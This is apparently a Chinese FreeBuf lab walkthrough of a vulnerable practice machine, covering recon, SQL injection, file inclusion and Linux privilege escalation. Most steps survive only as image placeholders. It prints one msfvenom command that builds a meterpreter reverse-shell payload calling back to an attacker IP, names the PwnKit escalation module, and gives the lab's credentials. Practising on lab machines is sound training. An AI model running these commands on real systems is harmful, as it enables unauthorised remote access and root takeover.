freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

M87
2024-04-28 15:21:26

信息收集

图片.png

端口号服务版本
22ssh
80httpApache httpd 2.4.38 ((Debian))
9090ssl/zeus-admin

目录爆破

图片.png

80端口:
图片.png

/admin
图片.png

/admin/backup
图片.png

FUZZ

对admin路径进行fuzz
图片.png

发现一个id参数

尝试sql注入
图片.png

因为是靶机,所以我直接dump
图片.png
图片.png

获取到一系列的用户名和密码

尝试一遍发现,都不能登陆成功

尝试对admin/backup进行fuzz
图片.png

同样可以获取到id和file

发现file我们尝试文件包含漏洞

发现用户名
图片.png
尝试使用这个用户名和之前爆破出来的密码进行登录

但是发现admin页面未响应
图片.png

80端口主页面也未响应
图片.png

admin/backup也仍未相应
图片.png

突破边界

查看9090端口(用户名charlotte,密码15The4Dm1n4L1f3)
图片.png

可以成功登录,且发现存在一个终端页面
图片.png

查看charlotte当前可用权限
图片.png

并不在sudoers中
图片.png

查看有无可利用的root权限指令
图片.png

但是因为当前用户并没在sudoer中,故无法使用命令提权

提权方法1:

使用msf模块进行漏洞检测并提权

尝试内核提权

生成linux后门文件

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.3.170 LPORT=5555 -f elf -o shell.elf

具体提权模块:

exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

注:该提权方法我就成功了一次,第二次怎么也连不上了
1540005767146.gif

提权方法2:

old
图片.png

图片.png
图片.png
图片.png

# 渗透测试 # 网络安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者